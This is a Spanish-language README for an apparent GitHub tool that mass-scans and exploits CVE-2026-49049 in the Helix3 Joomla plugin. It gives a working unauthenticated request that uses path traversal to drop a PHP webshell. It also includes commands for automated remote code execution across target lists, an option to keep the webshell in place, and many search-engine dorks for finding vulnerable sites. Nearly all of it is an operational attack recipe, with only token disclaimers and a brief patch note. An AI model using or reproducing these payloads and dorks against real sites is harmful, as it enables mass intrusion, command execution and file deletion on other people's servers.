
CVE-2026-49049 Helix3 (JoomShaper) Escáner de RCE AJAX no autenticado para Joomla
Escáner / verificador masivo para CVE-2026-49049: manejador AJAX no autenticado en el plugin Helix3 Framework para Joomla (v1.0 – 3.1.0, parcheado en 3.1.1+).
Solo pruebas autorizadas. Úselo únicamente en sistemas que posea o para los que tenga permiso por escrito.
El manejador onAjaxHelix3() en plugins/ajax/helix3/helix3.php es accesible a través de com_ajax de Joomla sin autenticación / token CSRF:
POST /index.php?option=com_ajax&plugin=helix3&format=json
Content-Type: application/x-www-form-urlencoded
data[action]=save&data[layoutName]=../../up.php&data[content]=<?php system($_GET['cmd']); ?>
| Acción | Impacto | Versiones |
|---|---|---|
save | Escritura arbitraria de archivo JSON + path traversal | 1.0 – 3.1.0 |
remove | Eliminación arbitraria de archivos (sin restricción de extensión/ruta) | 1.0 – 3.1.0 |
import | Sobrescribe parámetros de plantilla en BD (custom_js sin escapar → XSS/deface) | solo v3.x |
| Versión Helix3 | save / remove | import | Estado |
|---|---|---|---|
| 1.0 – 2.x | Vulnerable | No presente | Vulnerable |
| 3.0 – 3.1.0 | Vulnerable | Vulnerable | Vulnerable |
| 3.1.1+ | Parcheado | Parcheado | Seguro |
La explotación masiva activa en la naturaleza a menudo suelta un webshell de doble extensión:
< 3.1.1save con layoutName=../../up.php + contenido PHP webshell.json → up.php.json cae en la raíz webAddHandler de Apache con multi-extensión ejecuta el token .phpGET /up.php.json?cmd=id → uid=33(www-data) = SHELL OKDetectar Helix3
→ POST com_ajax?plugin=helix3 (action=save, traversal)
→ up.php.json escrito
→ GET up.php.json?cmd=id
→ uid=33(www-data)
git clone https://github.com/ExDev994/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt
Requisitos: requests>=2.31.0, colorama>=0.4.6, Python 3.9+.
Edite targets.txt — una URL / host por línea (# = comentario). La ruta de Joomla se conserva:
# ejemplo
https://example.com/
https://example.com/joomla/
http://192.168.1.50/
No suelta webshell. Verifica versión + prueba save / remove / import:
python3 scan.py -f targets.txt --scan -o results.txt
python3 scan.py -f targets.txt --auto -c "id" -o results.txt
python3 scan.py -t https://target.tld/joomla/ --auto -c "id"
# Mantener webshell después de verificar (demo autorizado)
python3 scan.py -f targets.txt --auto --keep
# Nombre de webshell personalizado + profundidades de traversal
python3 scan.py -f targets.txt --auto \
--webshell-name up.php \
--traversal-depths "../../,../../../"
# Reporte JSON + concurrencia
python3 scan.py -f targets.txt --auto -c "whoami" \
--threads 20 --timeout 15 \
-o results.txt --json report.json
# Proxy (Burp / etc)
python3 scan.py -t https://target.tld/ --scan --proxy http://127.0.0.1:8080
| Flag | Descripción |
|---|---|
-f / --file | Archivo con lista de objetivos (por defecto: targets.txt si -t ausente) |
-t / --target | URL de un solo objetivo |
--scan | Detección solo lectura |
--auto | Detectar + verificar RCE (por defecto) |
-c / --cmd | Comando de verificación (por defecto: id) |
-o / --output | Archivo de resultados — solo objetivos VULN / SHELL_OK |
--json | Reporte JSON estructurado |
--keep | No eliminar webshell automáticamente después de verificar |
--threads | Trabajadores concurrentes (por defecto: 15) |
--timeout | Tiempo de espera HTTP en segundos (por defecto: 15) |
Advertencia: El modo
--autointenta escribir un webshell mediante path traversal. Por defecto, el webshell se elimina después de la verificación. Use--keepsolo para demos autorizadas.
Terminal muestra todos los estados (progreso). results.txt solo contiene los vulnerables:
[v] CVE-2026-49049 SHELL OK https://target.tld Helix3 2.5.6 save=Y remove=Y import=N
[id] -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell: https://target.tld/up.php.json?cmd=id
[ ] VULN (sin shell) https://target.tld Helix3 3.0.2 save=Y remove=Y import=Y
Otras etiquetas (PATCHED, NOT_HELIX3, TIMEOUT, UNKNOWN) solo aparecen en terminal, no en results.txt.
Use los siguientes dorks para encontrar activos Helix3 / Joomla potencialmente afectados. Solo escanee objetivos autorizados.
inurl:templates/shaper_helix3/templateDetails.xml
inurl:"templates/shaper_helix3"
"shaper_helix3" "Joomla"
inurl:index.php?option=com_ajax "helix3"
"powered by Helix" Joomla
intitle:"Home" "shaper_helix3"
inurl:/templates/helix3/
http.html:"shaper_helix3"
http.html:"Helix3" http.html:"Joomla"
http.title:"Joomla" "shaper_helix3"
http.html:"/templates/shaper_helix3/"
http.html:"joomshaper" product:"Joomla"
html:"plg_system_helix3"
body="shaper_helix3"
body="/templates/shaper_helix3/" && body="Joomla"
body="Helix3" && body="joomshaper"
body="plg_ajax_helix3" || body="onAjaxHelix3"
title="Joomla" && body="shaper_helix3"
body="templateDetails.xml" && body="helix3"
# Verificar versión
curl -sk 'https://TARGET/templates/shaper_helix3/templateDetails.xml' | grep -i version
# Prueba de save sin autenticación (solo autorizado)
curl -sk -X POST \
'https://TARGET/index.php?option=com_ajax&plugin=helix3&format=json' \
-d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'
Actualice el plugin System – Helix3 Framework y Helix3 – Ajax a 3.1.1 o superior (se recomienda 3.1.2).
Actualizar no limpia los payloads que ya están en la base de datos.